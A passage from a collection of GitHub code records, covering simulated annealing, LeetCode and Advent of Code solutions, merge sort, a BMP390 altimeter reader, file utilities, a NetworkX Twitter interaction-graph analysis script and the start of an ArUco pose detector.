node_id=None,\n random_start=False,\n verbose=False):\n\n if node_id is not None:\n pose = sg.getPose(edge_id=node_id)\n else:\n pose = sg.getPose()\n object_pose_dict, bounds = gen_bound(pose)\n\n # generate an initial point\n if random_start:\n best = bounds[:, 0] + rand(len(bounds)) * (bounds[:, 1] - bounds[:, 0])\n else:\n best = pose2arr(pose, object_pose_dict, [])\n\n # evaluate the initial point\n best_eval = objective[0](best, object_pose_dict, sg)\n # current working solution\n curr, curr_eval = best, best_eval\n\n eval_arr, counts_cycles, counts_resets = [], 0, 0\n n = len(curr)\n a = np.zeros(n)\n step_vector = MAX_STEP_SIZE * np.ones(n)\n c = 0.1 * np.ones(n)\n t = MAX_TEMP\n # run the algorithm\n i = 0\n while i < 5000:\n i += 1\n for iter in range(n):\n step = np.zeros(n)\n step[iter] = 2 * (rand() - 0.5) * step_vector[iter]\n temp = curr + step\n temp_eval = objective[0](temp, object_pose_dict, sg)\n diff_temp_eval = temp_eval - curr_eval\n if diff_temp_eval < 0 or rand() < np.exp(-diff_temp_eval / t):\n curr, curr_eval = temp, temp_eval\n a[iter] += 1.\n if curr_eval < best_eval:\n best, best_eval = curr, curr_eval\n\n counts_cycles += 1\n if counts_cycles <= NUM_CYCLES_STEP: continue\n\n counts_cycles = 0\n step_vector = corana_update(step_vector, a, c, NUM_CYCLES_STEP)\n a = np.zeros(n)\n 
counts_resets += 1\n if counts_resets <= NUM_CYCLES_TEMP: continue\n\n t *= TEMP_COEFF\n counts_resets = 0\n eval_arr.append(curr_eval)\n if not (len(eval_arr) > NUM_CYCLES_EPS and eval_arr[-1] - best_eval <= EPS_THRESH and \\\n (abs((eval_arr[-1] - np.array(eval_arr))[-NUM_CYCLES_EPS:])<= EPS_THRESH).all()):\n curr, curr_eval = best, best_eval\n if verbose:\n best_tmp = [float(\"{:.4f}\".format(x)) for x in list(best)]\n print('>{} f({}) = {:.4f}, temp: {:.4f}'.format(\n i, best_tmp, best_eval, t))\n\n else:\n break\n\n return [best, best_eval]\n\n\ndef corana_update(v, a, c, ns):\n for i in range(len(v)):\n ai, ci = a[i], c[i]\n\n if ai > 0.6 * ns:\n v[i] *= (1 + ci * (ai / ns - 0.6) / 0.4)\n elif ai < 0.4 * ns:\n v[i] /= (1 + ci * (0.4 - ai / ns) / 0.4)\n\n return v\n","repo_name":"zyjiao4728/POG-Demo","sub_path":"pog/algorithm/annealing.py","file_name":"annealing.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"73405994348","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n #result array and subset array\n res = []\n\n subset = []\n def dfs(i):\n if i >= len(nums):\n res.append(subset.copy())\n return \n \n #left tree\n subset.append(nums[i])\n dfs(i + 1)\n\n #right tree\n subset.pop()\n dfs(i + 1)\n \n dfs(0)\n return res","repo_name":"Astovall9900/Leetcode","sub_path":"0078-subsets/0078-subsets.py","file_name":"0078-subsets.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3249534271","text":"# Day11.py\n#\n# First attempt at doing Day 11 of Advent of Code 2022\n\nimport sys\nsys.path.append(\"..\")\n\nfrom perf import calc_perf\nfrom math import lcm\nfrom functools import reduce\n\nclass Monkey(object):\n def __init__(self):\n self.items = []\n self.new_iter = []\n self.post_opt = []\n self.val = 0\n self.operation = []\n self.inspected = 0\n\n def test(self, item): # Does the test for Part 1\n new_val = item // 3\n if new_val % self.val == 0:\n return new_val, self.post_opt[0]\n else:\n return new_val, self.post_opt[1]\n\n def test2(self, item): # Does the test for Part 2\n if item % self.val == 0:\n return item, self.post_opt[0]\n else:\n return item, self.post_opt[1]\n\n def perform_opt(self, item):\n if self.operation[0] == '+':\n item += int(self.operation[1])\n elif self.operation[0] == '*':\n if self.operation[1] == 'old':\n item *= item\n else:\n item *= int(self.operation[1])\n return item\n\n\ndef read_input(file_name):\n with open(file_name, 'r') as f:\n read_list = f.read().splitlines()\n read_list = [line.split(': ') for line in read_list]\n\n gen_list = []\n\n for line in read_list:\n if line[0].lstrip().startswith('Monkey'):\n curr_monkey = Monkey()\n gen_list.append(curr_monkey)\n elif line[0].lstrip().startswith('Starting items'):\n for item in line[1].split(', '):\n curr_monkey.items.append(int(item))\n elif line[0].lstrip().startswith('Operation'):\n splited_lines = line[1].split(' ')\n curr_monkey.operation = [splited_lines[-2],splited_lines[-1]]\n elif line[0].lstrip().startswith('Test'):\n curr_monkey.val = int(line[-1].split(' ')[-1])\n elif line[0].lstrip().startswith(\"If\"):\n curr_monkey.post_opt.append(int(line[1][-1]))\n\n return gen_list\n\ndef cycle(input_list):\n # Perform passes\n for monkey in input_list:\n items_to_pop = len(monkey.items)\n for item in monkey.items:\n new_item = monkey.perform_opt(item)\n 
val, pass_to = monkey.test(new_item)\n            input_list[pass_to].items.append(val)\n            monkey.inspected += 1\n        for idx in range(0, items_to_pop):\n            monkey.items.pop(0)\n\ndef cycle2(input_list, common_div):\n    # Perform passes\n    for monkey in input_list:\n        items_to_pop = len(monkey.items)\n        for item in monkey.items:\n            new_item = monkey.perform_opt(item)\n            val, pass_to = monkey.test2(new_item)\n            input_list[pass_to].items.append(val%common_div)\n            monkey.inspected += 1\n        for idx in range(0, items_to_pop):\n            monkey.items.pop(0)\n\ndef main():\n    ## Part 1\n    # b = read_input(\"Day11_test_input.txt\")\n    b = read_input(\"Day11_input.txt\")\n\n    for idx in range(0,20):\n        cycle(b)\n    # Debug:\n    # for monkey in b:\n    #     print(f'{monkey.items}')\n    #\n    # print(f'Inspected:{[monkey.inspected for monkey in b]}')\n\n    val = sorted([monkey.inspected for monkey in b], key=lambda x:-x)\n    print(f'Monkey Business: {val[0]*val[1]}')\n\ndef main2():\n    # Part 2\n    # a = read_input(\"Day11_test_input.txt\")\n    a = read_input(\"Day11_input.txt\")\n    common_div = reduce(lcm,([i.val for i in a]))\n\n    for idx in range(0,10000):\n        cycle2(a, common_div)\n\n    print(f'Inspected:{[monkey.inspected for monkey in a]}')\n    val = sorted([monkey.inspected for monkey in a], key=lambda x:-x)\n    print(f'Monkey Business: {val[0]*val[1]}')\n\nif __name__ == \"__main__\":\n    ## Part 1\n    calc_perf(main())\n\n    ## Part 2\n    calc_perf(main2())\n","repo_name":"jeremyleung521/Advent_of_Code2022","sub_path":"python/Day11/Day11.py","file_name":"Day11.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"70579741547","text":"# merge sort\n# time complexity, worst case, best case, space complexity\n# O(nlogn), O(nlogn), O(nlogn), O(n)\ndef merge(l, r):\n    \"\"\"\n    The merge step\n    :param l:\n    :param r:\n    :return:\n    \"\"\"\n    new_list = []\n    tag_l = 0\n    tag_r = 0\n    while tag_l < len(l) and tag_r < len(r):\n        if l[tag_l] < r[tag_r]:\n            new_list.append(l[tag_l])\n            tag_l = tag_l + 1\n        else:\n            new_list.append(r[tag_r])\n            tag_r = tag_r + 1\n    if tag_l == len(l):\n        for i in r[tag_r:]:\n            new_list.append(i)\n    elif tag_r == len(r):\n        for j in l[tag_l:]:\n            new_list.append(j)\n    return new_list\n\n\ndef merge_sort(ls):\n    \"\"\"\n    Merge sort: split first, then merge\n    the splitting step\n    recursive\n    :param ls:\n    :return:\n    \"\"\"\n    if len(ls) <= 1:\n        return ls\n    middle = int(len(ls) / 2)\n    left = merge_sort(ls[:middle])\n    right = merge_sort(ls[middle:])\n    return merge(left, right)\n\n\nif __name__ == \"__main__\":\n    a = [4, 7, 8, 3, 5, 9]\n\n    print(merge_sort(a))","repo_name":"liying123456/python_leetcode","sub_path":"sort/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"40427432627","text":"import time\nimport board\nimport adafruit_bmp3xx\n\ni2c = board.I2C()\nbmp = adafruit_bmp3xx.BMP3XX_I2C(i2c)\n\nbmp.pressure_oversampling = 4\n# bmp.temperature_oversampling = 1\nbmp.sea_level_pressure = 988\n\nn = 100\nsea_sum = 0\nfor _ in range(n):\n    sea_sum += bmp.pressure\n    time.sleep(0.01)\nbmp.sea_level_pressure = int(sea_sum/n)\n\nstart_time = time.time()\nsamples = 0\nwhile True:\n    #print(\n    #    \"Pressure: {:6.4f} Temperature: {:5.2f}\".format(bmp.pressure, bmp.temperature)\n    #)\n    print('Pressure: {} Pascals'.format(bmp.pressure))\n    print('Altitude: {} meters'.format(bmp.altitude))\n    # time.sleep(1)\n    print(f\"Sample Rate: {samples/(time.time() - start_time)}Hz\")\n    samples += 
1\n\n","repo_name":"noronhadaniel/ACS_2023","sub_path":"Examples/altimeter_bmp390.py","file_name":"altimeter_bmp390.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"74548502506","text":"\"\"\"\nFile: dataset.py\nAuthor: Binguan Liu\nDate: Dec 15, 2020\nBrief: Inerface of dataset\n\"\"\"\n\nimport os\nimport os.path as osp\nimport zipfile\nfrom typing import List, Tuple\n\n\ndef mkdir(output_dir : str) -> None:\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n\ndef zipdir(path, result_path):\n zipf = zipfile.ZipFile(result_path, \"w\")\n for root, dirs, files in os.walk(path):\n for file in files:\n zipf.write(\n osp.join(root, file),\n osp.relpath(osp.join(root, file), osp.join(path, '..'))\n )\n zipf.close()\n\n\ndef load_list(path : str) -> List[str]:\n \"\"\"load list from text file\"\"\"\n assert osp.exists(path), \"{} does not exist\".format(path)\n\n ret = []\n with open(path, \"r\") as f:\n for line in f:\n ret.append(line.strip())\n return ret\n\n\ndef load_leison_classes(path : str) -> Tuple[List[str], List[str]]:\n \"\"\"load retinal lesion classes info from text file\"\"\"\n assert osp.exists(path), \"{} does not exist\".format(path)\n\n classes = []\n classes_abbrev = []\n with open(path, \"r\") as f:\n for line in f:\n class_name, class_abbrev_name = line.strip().split(\",\")\n classes.append(class_name)\n classes_abbrev.append(class_abbrev_name)\n return classes, classes_abbrev\n","repo_name":"by-liu/SegLossBias","sub_path":"seglossbias/utils/file_io.py","file_name":"file_io.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"25517464559","text":"print('-=-' * 20)\nprint('Calcular numeros impares e calcular que são multiplos de 3 de 1 À 50')\nprint('-=-' * 20)\n\nsoma = 0\ncont = 0\nfor c in range(1,501, +2):\n\n if (c % 3) ==0:\n cont = cont + 1\n soma += c\n # soma = soma + c\nprint('A Soma de todos {} os os solicitados é: {}'.format(cont,soma))\n","repo_name":"adriano-create/Exercicios-Python-Curso-em-V-deo","sub_path":"Ex048.py","file_name":"Ex048.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43214442004","text":"import networkx as nx\nfrom networkx.readwrite import json_graph\nfrom collections import defaultdict\nimport os\nfrom os.path import join, dirname\nimport sys\nimport uuid\nimport json\nfrom plotly.graph_objs import *\nfrom plotly import tools\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nimport argparse\nimport numpy\nfrom dotenv import load_dotenv\nimport csv\nimport warnings\nimport pandas\nimport json\nwarnings.filterwarnings('ignore')\n\n\nclass Network:\n\n def __init__(self, DIR, input_file, relationships,prune):\n\n self.DIR = DIR\n\n Array = []\n with open(input_file,'r',encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n try:\n for row in reader:\n Array.append(row)\n except Exception as e:\n print(e)\n df = pandas.DataFrame(Array[1:],columns=Array[0])\n #df = pandas.read_csv(input_file, encoding=\"utf-8\")\n \n if relationships == 'reply_to':\n if input_file.find('twitter-Tweet') != -1:\n df = df[['text','user.screen_name']].dropna()\n df['reply_to'] = df['text'].str.extract('^@([A-Za-z0-9-_]+)',expand=True)\n new_df = df[['reply_to','user.screen_name','text']].dropna()\n self.graph = 
nx.DiGraph()\n self.directed = 'directed'\n for row in new_df.iterrows():\n self.graph.add_edge(row[1]['user.screen_name'], row[1]['reply_to'], text=row[1]['text'])\n\n elif input_file.find('twitter-Stream') != -1:\n df = df[['_source.text','_source.user.screen_name']].dropna()\n df['reply_to'] = df['_source.text'].str.extract('^@([A-Za-z0-9-_]+)',expand=True)\n new_df = df[['reply_to','_source.user.screen_name','_source.text']].dropna()\n self.graph = nx.DiGraph()\n self.directed = 'directed'\n for row in new_df.iterrows():\n self.graph.add_edge(row[1]['_source.user.screen_name'], row[1]['reply_to'], text=row[1]['_source.text'])\n\n elif relationships == 'retweet_from':\n if input_file.find('twitter-Tweet') != -1:\n df = df[['text','user.screen_name']].dropna()\n df['retweet_from'] = df['text'].str.extract('RT @([A-Za-z0-9-_]+):',expand=True)\n new_df = df[['retweet_from','user.screen_name','text']].dropna()\n self.graph = nx.DiGraph()\n self.directed = 'directed'\n for row in new_df.iterrows():\n self.graph.add_edge(row[1]['user.screen_name'],row[1]['retweet_from'], text=row[1]['text'])\n\n elif input_file.find('twitter-Stream') != -1:\n df = df[['_source.text','_source.user.screen_name']].dropna()\n df['retweet_from'] = df['_source.text'].str.extract('RT @([A-Za-z0-9-_]+):',expand=True)\n new_df = df[['retweet_from','_source.user.screen_name','_source.text']].dropna()\n self.graph = nx.DiGraph()\n self.directed = 'directed'\n for row in new_df.iterrows():\n self.graph.add_edge(row[1]['_source.user.screen_name'],row[1]['retweet_from'], text=row[1]['_source.text'])\n \n elif relationships == 'mentions':\n \n if input_file.find('twitter-Tweet') != -1:\n df = df[['text','user.screen_name']].dropna()\n df['mentions'] = df['text'].str.findall('@([A-Za-z0-9-_]+)')\n tmp = []\n def backend(r):\n x = r['user.screen_name']\n y = r['text']\n zz = r['mentions']\n for z in zz:\n tmp.append({'screen_name':x, \n 'tweet':y,\n 'mention':z})\n df.apply(backend,axis=1)\n new_df = pandas.DataFrame(tmp).dropna()\n \n elif input_file.find('twitter-Stream') != -1:\n df = df[['_source.text','_source.user.screen_name']].dropna()\n df['mentions'] = df['_source.text'].str.findall('@([A-Za-z0-9-_]+)')\n tmp = []\n def backend(r):\n x = r['_source.user.screen_name']\n y = r['_source.text']\n zz = r['mentions']\n for z in zz:\n tmp.append({'screen_name':x, \n 'tweet':y,\n 'mention':z})\n df.apply(backend,axis=1)\n new_df = pandas.DataFrame(tmp).dropna()\n \n self.graph = nx.DiGraph()\n self.directed = 'directed'\n for row in new_df.iterrows():\n self.graph.add_edge(row[1]['screen_name'], row[1]['mention'], text=row[1]['tweet'])\n \n # prune the network or not\n if prune == 'isolates':\n for n in self.graph.nodes():\n if self.graph.degree()[n] <= 1:\n # check if its neighbour's total degree\n for neighbour in self.graph[n].keys():\n if self.graph.degree()[neighbour] <= 1:\n self.graph.remove_node(n)\n self.graph.remove_nodes_from(nx.isolates(self.graph))\n elif prune == 'weakly_connected':\n weak = nx.weakly_connected_components(self.graph)\n to_remove = []\n for n in weak:\n to_remove.append(list(n)[0]) \n self.graph.remove_nodes_from(to_remove)\n self.graph.remove_nodes_from(nx.isolates(self.graph))\n\n elif prune == 'influencer':\n for n in self.graph.nodes():\n if self.graph.in_degree()[n] == 0:\n self.graph.remove_node(n)\n \n \n \n \n def export_graph(self):\n # JSON format\n d3js_graph = json_graph.node_link_data(self.graph)\n d3js_graph['nodes'] = [\n {\n 'id':node['id'],\n 
'connectivity':self.graph.in_degree()[node['id']] + self.graph.out_degree()[node['id']]\n }\n for node in d3js_graph['nodes']\n ]\n fname_d3js = self.DIR + '/d3js.json'\n with open(fname_d3js,\"w\") as f:\n json.dump(d3js_graph,f)\n print(fname_d3js)\n\n # Gehpi readable format\n fname_gephi = self.DIR + '/network.gml'\n nx.write_gml(self.graph,fname_gephi)\n print(fname_gephi)\n\n # Pajek format\n fname_pajek = self.DIR + '/network.net'\n nx.write_pajek(self.graph,fname_pajek)\n print(fname_pajek)\n \n\n def draw_graph(self,relationships,layout):\n\n if layout == 'spring':\n pos = nx.spring_layout(self.graph)\n elif layout == 'circular':\n pos = nx.circular_layout(self.graph)\n elif layout == 'fruchterman':\n pos = nx.fruchterman_reingold_layout(self.graph)\n elif layout == 'random':\n pos = nx.random_layout(self.graph)\n elif layout == 'shell':\n pos = nx.shell_layout(self.graph)\n elif layout == 'spectral':\n pos = nx.spectral_layout(self.graph)\n\n edge_attri = nx.get_edge_attributes(self.graph,'text')\n edge_trace = Scatter(x=[], y=[], text=[], line=Line(width=1,color='#b5b5b5'), hoverinfo='text',mode='lines',hoveron='points')\n for edge in self.graph.edges():\n x0, y0 = pos[edge[0]]\n x1, y1 = pos[edge[1]]\n edge_trace['x'] += [x0,x1,None]\n edge_trace['y'] += [y0,y1,None]\n edge_trace['text'].append(edge_attri[edge])\n \n node_trace = Scatter(x=[],y=[],text=[],mode='markers', hoverinfo='text',hoveron='points+fills',\n marker=Marker(\n showscale=True,\n # colorscale options\n # 'Greys' | 'Greens' | 'Bluered' | 'Hot' | 'Picnic' | 'Portland' |\n # Jet' | 'RdBu' | 'Blackbody' | 'Earth' | 'Electric' | 'YIOrRd' | 'YIGnBu'\n colorscale='Portland', reversescale=False, color=[],\n size=10,\n colorbar=dict(\n thickness=15,\n title='node connectivity',\n xanchor='left',\n titleside='right'\n ),\n line=dict(width=2)))\n for node in self.graph.nodes():\n x, y= pos[node]\n node_trace['x'].append(x)\n node_trace['y'].append(y)\n\n # label\n # if digraph\n if relationships == 'reply_to':\n for node in self.graph.nodes():\n node_trace['marker']['color'].append(self.graph.in_degree()[node] + self.graph.out_degree()[node])\n node_trace['text'].append(\"@\" + node + \" is replied by \" + str(self.graph.in_degree()[node]) + \" user(s), and replies to \" + str(self.graph.out_degree()[node]) + \" user(s)\")\n \n elif relationships == 'retweet_from':\n for node in self.graph.nodes():\n node_trace['marker']['color'].append(self.graph.in_degree()[node] + self.graph.out_degree()[node])\n node_trace['text'].append(\"@\" + node + \" is retweeted by \" + str(self.graph.in_degree()[node]) + \" user(s) and retweets from \" + str(self.graph.out_degree()[node]) + \" user(s)\")\n\n elif relationships == 'mentions':\n for node in self.graph.nodes():\n node_trace['marker']['color'].append(self.graph.in_degree()[node] + self.graph.out_degree()[node])\n node_trace['text'].append(\"@\" + node + \" is mentioned by \" + str(self.graph.in_degree()[node]) + \" user(s) and mentions \" + str(self.graph.out_degree()[node]) + \" user(s)\")\n \n fig = Figure(data=Data([edge_trace, node_trace]), layout=Layout(\n title= relationships + ' Network Graph',\n titlefont=dict(size=16), showlegend=False,\n hovermode='closest', margin=dict(b=20,l=5,r=5,t=40),\n annotations=[ dict(\n text=\"Export to plot.ly to view the tweets and user information!\",\n showarrow=False,\n xref=\"paper\", yref=\"paper\",\n x=0.005, y=-0.002 ) ],\n xaxis=XAxis(showgrid=False, zeroline=False, showticklabels=False),\n yaxis=YAxis(showgrid=False, zeroline=False, 
showticklabels=False)\n ))\n div = plot(fig, output_type='div',image='png',auto_open=False, image_filename='plot_img')\n fname_div = self.DIR + '/div.dat'\n with open(fname_div,\"w\") as f:\n f.write(div)\n print(fname_div)\n\n\n def approximation(self):\n result = {}\n result['all_pairs_node_connectivity'] = nx.all_pairs_node_connectivity(self.graph)\n result['node_connectivity'] = nx.node_connectivity(self.graph)\n\n if self.directed == 'undirected':\n result['k_components'] = nx.k_components(self.graph)\n result['average_clustering'] = nx.average_clustering(self.graph)\n\n fname_approx = self.DIR + '/appoximation.json'\n with open(fname_approx,\"w\") as f:\n json.dump(result, f, cls=SetEncoder,indent=2)\n print(fname_approx)\n\n\n\n def assortativity(self):\n result = {}\n result['degree_assortativity_coefficient']=nx.degree_assortativity_coefficient(self.graph)\n\n if self.directed == 'undirected':\n result['degree_pearson_correlation_coefficient']=nx.degree_pearson_correlation_coefficient(self.graph)\n \n result['average_neighbor_degree']=nx.average_neighbor_degree(self.graph)\n result['average_degree_connectivity']=nx.average_degree_connectivity(self.graph)\n result['k_nearest_neighbors']=nx.k_nearest_neighbors(self.graph)\n\n fname_assort = self.DIR + '/assortativity.json'\n with open(fname_assort,\"w\") as f:\n json.dump(result, f, cls=SetEncoder,indent=2)\n print(fname_assort)\n\n\n\n def centrality(self):\n result = {}\n result['degree_centrality']=nx.degree_centrality(self.graph)\n\n if self.directed == 'directed':\n result['in_degree_centrality']=nx.in_degree_centrality(self.graph)\n result['out_degree_centrality']=nx.out_degree_centrality(self.graph)\n \n result['closeness_centrality']=nx.closeness_centrality(self.graph)\n result['betweenness_centrality']=nx.betweenness_centrality(self.graph)\n\n # fix the tuple cant decode into json problem\n stringify_temp={}\n temp = nx.edge_betweenness_centrality(self.graph)\n for key in temp.keys():\n stringify_temp[str(key)] = temp[key]\n result['edge_betweenness_centrality']= stringify_temp\n\n if self.directed == 'undirected':\n result['current_flow_closeness_centrality']=nx.current_flow_closeness_centrality(self.graph)\n result['current_flow_betweenness_centrality']=nx.current_flow_betweenness_centrality(self.graph)\n\n stringify_temp={}\n temp = nx.edge_current_flow_betweenness_centrality(self.graph)\n for key in temp.keys():\n stringify_temp[str(key)] = temp[key]\n result['edge_current_flow_betweenness_centrality']=stringify_temp\n \n result['approximate_current_flow_betweenness_centrality']=nx.approximate_current_flow_betweenness_centrality(self.graph)\n result['eigenvector_centrality']=nx.eigenvector_centrality(self.graph)\n result['eigenvector_centrality_numpy']=nx.eigenvector_centrality_numpy(self.graph)\n result['katz_centrality']=nx.katz_centrality(self.graph)\n result['katz_centrality_numpy']=nx.katz_centrality_numpy(self.graph)\n result['communicability']=nx.communicability(self.graph)\n result['communicability_exp']=nx.communicability_exp(self.graph)\n result['communicability_centrality']=nx.communicability_centrality(self.graph)\n result['communicability_centrality_exp']=nx.communicability_centrality_exp(self.graph)\n result['communicability_betweenness_centrality']=nx.communicability_betweenness_centrality(self.graph)\n result['estrada_index']=nx.estrada_index(self.graph)\n \n result['load_centrality']=nx.load_centrality(self.graph)\n\n stringify_temp={}\n temp = nx.edge_load(self.graph)\n for key in temp.keys():\n 
stringify_temp[str(key)] = temp[key]\n result['edge_load']= stringify_temp\n result['dispersion']=nx.dispersion(self.graph)\n \n fname_centra = self.DIR + '/centrality.json'\n with open(fname_centra,\"w\") as f:\n json.dump(result, f, cls=SetEncoder,indent=2)\n print(fname_centra)\n\n\n\n\n def cluster(self):\n rslt={}\n \n rslt['transitivity']=nx.transitivity(self.graph)\n rslt['square_clustering']=nx.square_clustering(self.graph)\n\n if self.directed == 'undirected':\n rslt['traingles']=nx.triangles(self.graph)\n rslt['clustering']=nx.clustering(self.graph)\n rslt['average_clustering']=nx.average_clustering(self.graph)\n\n fname_cluster = self.DIR + '/cluster.json'\n with open(fname_cluster,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_cluster)\n\n\n # only directed graph\n def component(self):\n rslt={}\n if self.directed == 'directed':\n rslt['is_strongly_connected']=nx.is_strongly_connected(self.graph)\n\n strong = nx.strongly_connected_components(self.graph)\n strong_nodes = []\n for n in strong:\n strong_nodes.append(list(n)[0])\n rslt['strongly_connected'] = strong_nodes\n\n \n rslt['number_strongly_connected_components']=nx.number_strongly_connected_components(self.graph)\n rslt['is_semiconnected']=nx.is_semiconnected(self.graph)\n\n weak = nx.weakly_connected_components(self.graph)\n weak_nodes = []\n for n in weak:\n weak_nodes.append(list(n)[0])\n rslt['wealy_connected'] = weak_nodes\n\n rslt['is_weakly_connected']=nx.is_weakly_connected(self.graph)\n rslt['number_weakly_connected_components']=nx.number_weakly_connected_components(self.graph)\n \n fname_component = self.DIR + '/component.json'\n with open(fname_component,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_component)\n\n # only undirected graph\n def distance(self):\n rslt={}\n if self.directed =='undirected':\n rslt['center']=nx.center(self.graph)\n rslt['diameter']=nx.diameter(self.graph)\n rslt['eccentricity']=nx.eccentricity(self.graph)\n rslt['periphery']=nx.periphery(self.graph)\n rslt['radius']=nx.radius(self.graph)\n\n fname_distance = self.DIR + '/distance.json'\n with open(fname_distance,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_distance)\n\n # directed\n def hierarchy(self):\n rslt={}\n\n if self.directed == 'directed':\n rslt['flow_hierarchy']=nx.flow_hierarchy(self.graph)\n rslt['isolates']=nx.isolates(self.graph)\n\n fname_hierarchy = self.DIR + '/' + 'hierarchy.json'\n with open(fname_hierarchy,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_hierarchy)\n\n\n def googleMatrix(self):\n fname = self.DIR + '/googleMatricx.txt'\n google_matrix=nx.google_matrix(self.graph)\n numpy.savetxt(fname,google_matrix)\n print(fname)\n \n\n def path(self):\n rslt={}\n rslt['shortest_path']=nx.shortest_path(self.graph)\n #rslt['average_shortest_path_length']=nx.average_shortest_path_length(self.graph)\n rslt['all_pairs_shortest_path']=nx.all_pairs_shortest_path(self.graph)\n\n fname_path = self.DIR + '/path.json'\n with open(fname_path,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_path)\n\n def tree(self):\n rslt={}\n rslt['is_tree']=nx.is_tree(self.graph)\n rslt['is_forest']=nx.is_forest(self.graph)\n\n if self.directed == 'directed':\n rslt['is_arborescence']=nx.is_arborescence(self.graph)\n rslt['is_branching']=nx.is_branching(self.graph)\n \n fname_tree = self.DIR + '/tree.json'\n with open(fname_tree,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n 
print(fname_tree)\n\n\n # directed\n def triads(self):\n rslt={}\n if self.directed == 'directed':\n rslt['triadic_census']=nx.triadic_census(self.graph)\n fname_triads = self.DIR + '/triads.json'\n with open(fname_triads,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_triads)\n\n def vitality(self):\n rslt={}\n rslt['closeness_vitality']=nx.closeness_vitality(self.graph)\n fname_vitality = self.DIR + '/vitality.json'\n with open(fname_vitality,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_vitality)\n\n def traversal(self):\n rslt={}\n \n rslt['dfs_predecessors']=nx.dfs_predecessors(self.graph)\n rslt['dfs_successors']=nx.dfs_successors(self.graph)\n #rslt['dfs_preorder_nodes']=nx.dfs_preorder_nodes(self.graph)\n #rslt['dfs_postorder_nodes']=nx.dfs_postorder_nodes(self.graph)\n #rslt['dfs_labeled_edges']=nx.dfs_labeled_edges(self.graph)\n #rslt['edge_dfs']=nx.edge_dfs(self.graph)\n #rslt['dfs_edges']=nx.dfs_edges(self.graph)\n #rslt['dfs_tree']=nx.dfs_tree(self.graph)\n\n fname_traversal = self.DIR + '/traversal.json'\n with open(fname_traversal,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_traversal)\n\n\nclass SetEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, set):\n return list(obj)\n if isinstance(obj, matrix):\n return str(obj)\n return json.JSONEncoder.default(self, obj)\n \n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Processing...\")\n parser.add_argument('--file', required=True)\n parser.add_argument('--layout',required=True)\n parser.add_argument('--relations',required=True)\n parser.add_argument('--prune',required=True)\n #parser.add_argument('--node_size',required=True)\n #parser.add_argument('--edge_width',required=True)\n \n args = parser.parse_args()\n\n #save arguments\n dotenv_path = join(dirname(__file__), '../../.env')\n load_dotenv(dotenv_path)\n \n uid = str(uuid.uuid4())\n DIR = os.environ.get('ROOTDIR') + os.environ.get('DOWNLOAD_NW_NETWORKX') +'/' + uid\n if not os.path.exists(DIR):\n os.makedirs(DIR)\n\n fname = DIR + '/config.dat'\n with open(fname,\"w\") as f:\n json.dump(vars(args),f)\n print(fname)\n \n network = Network(DIR, args.file, args.relations, args.prune)\n network.export_graph()\n network.draw_graph(args.relations, args.layout) #, args.node_size, args.edge_width)\n\n \n #network.approximation()\n try:\n network.assortativity()\n except:\n pass\n\n try:\n network.centrality()\n except:\n pass\n\n try:\n network.cluster()\n except:\n pass\n\n try:\n network.component()\n except:\n pass\n\n try:\n network.hierarchy()\n except:\n pass\n\n try:\n network.triads()\n except:\n pass\n \n # network.googleMatrix()\n try:\n network.path()\n except:\n pass\n try:\n network.tree()\n except:\n pass\n try:\n network.vitality()\n except:\n pass\n try:\n network.traversal()\n except:\n pass\n","repo_name":"kevinwojo/analytics-standalone","sub_path":"www/scripts/NetworkX/network_analysis.py","file_name":"network_analysis.py","file_ext":"py","file_size_in_byte":22171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14865102283","text":"import cv2\r\nimport math\r\nimport numpy as np\r\n\r\nfrom PanTilt import PanTilt as PanTilt\r\nfrom utils import ARUCO_DICT\r\n\r\n\r\nclass PoseDetector:\r\n\r\n #Check if Rotation Matrix\r\n def isRotationMatrix(R):\r\n Rt = np.transpose(R)\r\n shouldBeIdentity = np.dot(Rt, R)\r\n I = np.identity(3, dtype=R.dtype)\r\n n = 
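# --- Editor's sketch (not part of the dataset records) ---
# The network_analysis.py record ending above repeatedly converts tuple edge keys
# to strings before json.dump and relies on a custom encoder for sets. A minimal
# standalone version of that pattern (graph and key names here are illustrative):
import json
import networkx as nx

class SetEncoder(json.JSONEncoder):
    """Serialize Python sets as lists so json.dump does not raise TypeError."""
    def default(self, obj):
        if isinstance(obj, set):
            return list(obj)
        return super().default(obj)

def stringify_keys(d):
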